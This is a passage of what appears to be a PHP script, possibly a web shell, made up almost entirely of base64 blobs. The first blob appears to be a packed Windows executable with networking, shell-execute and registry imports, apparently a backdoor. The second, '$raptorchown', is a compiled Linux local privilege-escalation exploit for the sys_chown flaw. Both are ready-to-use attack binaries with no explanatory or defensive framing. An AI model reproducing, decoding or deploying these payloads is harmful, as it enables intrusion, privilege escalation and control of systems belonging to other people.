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 +//////////////hweH/////////////////4cHh/////////////////+HB4f/////////////// +//hweH/////////////////4cHh/////////////////+HB4f/////////////////hweH////// +///////////4cHh/////////////////+HB4f/////////////////hweH/////////////////4 +cHh/////////////////+HB4f/////////////////hweH/////////////////4cHh///////// +////////+HB4f/////////////////hweH/////////////////4cHh/////////////////+HB4 +d3d3d3d3d3d3d3d3d3hweIiIiIiIiIiIiIiIiIiIcHhERERERERERERAAAAAAHB4RERERERERERE +SICICIBweEREREREREREREiAiAiAcHhERERERERERERERERERHB4iIiIiIiIiIiIiIiIiIhwd3d3 +d3d3d3d3d3d3d3d3cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//////// +///MlAEAAAABAAEAICAEAAEABADoAgAAAQAAAAAAAAAAAAAAAABQxQEACMUBAAAAAAAAAAAAAAAA +AF3FAQAYxQEAAAAAAAAAAAAAAAAAasUBACDFAQAAAAAAAAAAAAAAAAB0xQEAKMUBAAAAAAAAAAAA +AAAAAIHFAQAwxQEAAAAAAAAAAAAAAAAAjcUBADjFAQAAAAAAAAAAAAAAAACYxQEAQMUBAAAAAAAA +AAAAAAAAAKTFAQBIxQEAAAAAAAAAAAAAAAAAAAAAAAAAAACwxQEAvsUBAM7FAQAAAAAA3MUBAAAA +AADqxQEAAAAAAPTFAQAAAAAABMYBAAAAAAAUxgEAAAAAAB7GAQAAAAAALsYBAAAAAABLRVJORUwz +Mi5ETEwAYWR2YXBpMzIuZGxsAGdkaTMyLmRsbABvbGVhdXQzMi5kbGwAc2hlbGwzMi5kbGwAdXNl +cjMyLmRsbAB3aW5pbmV0LmRsbAB3c29jazMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0Fk +ZHJlc3MAAEV4aXRQcm9jZXNzAAAAUmVnRW51bUtleUEAAABUZXh0T3V0QQAAU3lzRnJlZVN0cmlu +ZwAAAFNoZWxsRXhlY3V0ZUEAAABTZXRGb2N1cwAASW50ZXJuZXRPcGVuQQAAAHNlbmQAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJFRU +Wdfb08/q3OiZ0eXTbpynnqlyfKdzc3NiXaFemV+lYJ1tYVdh1OXK1tbYm9vo02Hp8MnR0+SWzNnY +ZVtSoFJcTlRPp5avqVzj4NrWosfQ1VBaUFrzrZi+wZ2ooauorLiWqJK8rLazkrimo5mVmJq3rquX +tKahmaip8li6s8aGztfv2s7TzFysw7iMwNPh3NrL2FQ="; + +$raptorchown="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 +Q29weXJpZ2h0IChjKSAyMDA0IE1hcmNvIEl2YWxkaSA8cmFwdG9yQDB4ZGVhZGJlZWYuaW5mbz4A +AAAAAAAAAHJhcHRvcl9jaG93bi5jIC0gc3lzX2Nob3duIG1pc3NpbmcgREFDIGNvbnRyb2xzIG9u +IExpbnV4ACVzCiVzCgoAdXNhZ2U6ICVzIGZpbGVfbmFtZQoKAEVycm9yOiBOb3QgdnVsbmVyYWJs +ZSEKAEVycm9yAE5pbnBvdTogc3lzX2Nob3duIG5vIGp1dHN1IQoAL2Jpbi9scyAtbCAlcwAAAAAA +AAAAAOSYBAgAAAAAAQAAAAEAAAAMAAAAnIMECA0AAADIhgQIBAAAAEiBBAgFAAAAYIIECAYAAACQ +gQQICgAAAJcAAAALAAAAEAAAABUAAAAAAAAAAwAAAOyYBAgCAAAASAAAABQAAAARAAAAFwAAAFSD +BAgRAAAARIMECBIAAAAQAAAAEwAAAAgAAAD+//9vFIMECP///28BAAAA8P//b/iCBAgAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAA +AAAAABCYBAgAAAAAAAAAAMqDBAjagwQI6oMECPqDBAgKhAQIGoQECCqEBAg6hAQISoQECAAAAAAA +R0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABH +Q0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAAR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdD +QzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAALnN5 +bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAuaW50ZXJwAC5ub3RlLkFCSS10YWcALmhhc2gALmR5bnN5 +bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAu +aW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3RvcnMA +LmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAABsAAAABAAAAAgAAABSBBAgUAQAAEwAAAAAAAAAAAAAAAQAAAAAAAAAj 